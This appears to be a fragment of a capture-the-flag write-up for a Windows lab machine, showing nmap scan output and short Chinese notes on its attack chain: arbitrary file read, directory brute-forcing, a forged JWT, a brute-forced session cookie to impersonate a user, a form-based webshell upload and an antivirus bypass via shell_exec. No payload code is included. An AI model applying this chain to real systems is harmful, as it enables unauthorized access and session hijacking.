Host is up (0.093s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
| 256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_ 256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp open http
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Library
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
| http-cookie-flags:
| /:
| PHPSESSID:
| secure flag not set and HTTPS in use
|_ httponly flag not set
|_http-title: Library
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds
3306/tcp open mysql
5040/tcp open unknown
7680/tcp open pando-pub
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Host script results:
|_clock-skew: -1h00m00s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-12T22:28:53
|_ start_date: N/A
Nmap done: 1 IP address (1 host up) scanned in 166.32 seconds
任意文件包含和sql注入的点。
仔细一看代码发现只是任意文件读取不能包含,下一步。
二级目录爆破,配合任意文件读取确定伪造paul用户的思路。
首先构造jwt
然后生成可能的cookie放到intruder里爆破。(因为就四位数,所以懒得写脚本了,手动cmd5走走)
(这里最开始一直不行,我就重置了下机子,然后出来了)
构造一手表单复制cookie直接上传。
这里会出现杀软阻挠的问题,但是问题不大,老样子shell_exec绕过就行了。